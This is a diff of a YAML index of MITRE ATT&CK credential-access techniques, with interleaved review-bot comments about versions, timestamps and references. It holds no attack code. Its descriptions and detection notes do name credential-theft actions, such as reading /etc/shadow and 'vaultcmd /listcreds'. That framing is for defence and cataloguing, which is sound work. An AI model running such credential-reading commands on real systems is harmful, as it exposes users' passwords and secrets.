Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46708,25 +47434,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46801,11 +47556,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -46849,11 +47603,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -46877,8 +47630,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
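Review bot: the GitHub AWS-ADFS-Credential-Generator reference switches from https://github.com/damianh/aws-adfs-credential-generator to https://github.com/pvanbuijtene/aws-adfs-credential-generator while the description still credits Damian Hickey (2017). A repository under a different account is a fork, not the cited artifact, and its contents can drift or disappear; if the original was removed, prefer a web.archive.org capture of it, as the other rewritten references in this diff do, and at minimum say in the commit message why the owner changed.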
@@ -46894,11 +47647,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46909,11 +47661,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -46923,16 +47677,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -46970,13 +47724,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46985,6 +47736,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -46992,11 +47744,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -47014,13 +47766,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -47033,6 +47782,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -47046,12 +47796,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -47083,17 +47834,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -47166,12 +47914,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -47180,6 +47927,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -47198,18 +47946,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -47233,13 +47981,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -47265,6 +48010,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -47276,18 +48022,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -47306,14 +48052,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47342,24 +48085,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -47394,13 +48139,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47478,14 +48220,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -47501,6 +48242,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47509,13 +48251,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -47523,15 +48265,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
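Review bot: dropping `x_mitre_permissions_required` (Administrator/SYSTEM/root/User) here, and the equivalent removals on T1003.008, T1556.001 and T1556.005 later in the patch, removes the privilege hint with no replacement field; confirm any rendering or filtering built on that key tolerates its absence. Note also that T1558.002 further down keeps its `x_mitre_permissions_required: - User`, so the treatment is not uniform across the patch.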
@@ -47542,9 +48280,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -47590,7 +48327,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
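Review bot: `modified` for T1557.002 moves backwards, from 2022-11-08 to 2022-07-22. The old value shares the `14:00:00.188Z` suffix with several other old `modified` values in this patch (T1056, T1556.001, T1556.005, T1555.004), which looks like a bulk stamp from the previous generator rather than an upstream timestamp, so the regression is probably a correction; confirm against the source snapshot and mention it in the PR description so it is not read as a stale import.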
@@ -47609,17 +48346,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -47652,10 +48388,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
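Review bot: `- SaaS` is removed from T1556.009's platforms, not renamed. Everywhere else in this patch SaaS survives the platform consolidation (T1110, T1110.004 and T1556.006 keep it and only lose Azure AD, Office 365 and Google Workspace), so this one narrows the technique's scope; confirm it matches the upstream object at `modified: 2024-09-16` before merging.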
@@ -47692,11 +48427,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47764,34 +48498,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47800,20 +48510,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
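Review bot: apart from the key reorder, the substantive change for T1003.008 is `x_mitre_permissions_required: - root` dropped and the version bump 1.0 to 1.1. Pre-existing and out of scope for this patch, but worth a follow-up: the `description: |` and `x_mitre_detection` blocks carry hard line breaks around `/etc/passwd` and `/etc/shadow` (for example `, alerting on the pid,` on its own line) where inline code markup was stripped, and the literal block style preserves those breaks in the rendered text.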
@@ -47845,7 +48577,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47871,13 +48603,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
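Review bot: for T1558.002 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed with no replacement visible in this hunk, while `x_mitre_permissions_required: - User` is kept; every other object touched by this patch retains an `x_mitre_attack_spec_version` and most lose `x_mitre_permissions_required`. Together with the `modified` regression in the preceding hunk (2021-04-29 to 2020-03-25), this suggests T1558.002 was not regenerated from the same snapshot as the rest; check that the object still carries `x_mitre_attack_spec_version` somewhere in its body.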
@@ -47894,24 +48624,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -47952,36 +48682,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -48002,6 +48709,7 @@ credential-access:
